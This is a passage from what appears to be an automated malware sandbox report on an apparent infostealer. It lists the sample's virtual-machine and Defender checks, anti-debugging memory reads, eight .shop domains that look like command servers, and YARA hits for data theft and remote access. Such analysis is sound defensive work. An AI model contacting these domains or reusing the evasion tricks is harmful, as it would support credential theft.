Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E92B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00E92B8C
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWm
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053177286.0000000000880000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.000000000109F000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.000000000107B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00461070 mov eax, dword ptr fs:[00000030h] 0_2_00461070
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00461260 mov eax, dword ptr fs:[00000030h] 0_2_00461260
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0046148C mov eax, dword ptr fs:[00000030h] 0_2_0046148C
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_004614B0 mov eax, dword ptr fs:[00000030h] 0_2_004614B0
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0045DD68 mov ecx, dword ptr fs:[00000030h] 0_2_0045DD68
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00460E50 mov eax, dword ptr fs:[00000030h] 0_2_00460E50
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A10B7 mov eax, dword ptr fs:[00000030h] 0_2_007A10B7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_007A14C7 mov eax, dword ptr fs:[00000030h] 0_2_007A14C7
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0074092B mov eax, dword ptr fs:[00000030h] 0_2_0074092B
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_00740D90 mov eax, dword ptr fs:[00000030h] 0_2_00740D90
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0079DFCF mov ecx, dword ptr fs:[00000030h] 0_2_0079DFCF
Source: C:\Users\user\Desktop\current[1].exe Code function: 0_2_0082E933 push dword ptr fs:[00000030h] 0_2_0082E933

HIPS / PFW / Operating System Protection Evasion

Source: current[1].exe String found in binary or memory: sofahuntingslidedine.shop
Source: current[1].exe String found in binary or memory: culturesketchfinanciall.shop
Source: current[1].exe String found in binary or memory: triangleseasonbenchwj.shop
Source: current[1].exe String found in binary or memory: modestessayevenmilwek.shop
Source: current[1].exe String found in binary or memory: liabilityarrangemenyit.shop
Source: current[1].exe String found in binary or memory: claimconcessionrebe.shop
Source: current[1].exe String found in binary or memory: secretionsuitcasenioise.shop
Source: current[1].exe String found in binary or memory: gemcreedarticulateod.shop
Source: SciTE.exe.1.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E91718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 1_2_00E91718
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E9139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00E9139F
Source: C:\Users\user\Desktop\current[1].exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: jJEAWO.exe PID: 7452, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: current[1].exe PID: 7436, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: jJEAWO.exe PID: 7452, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: current[1].exe PID: 7436, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR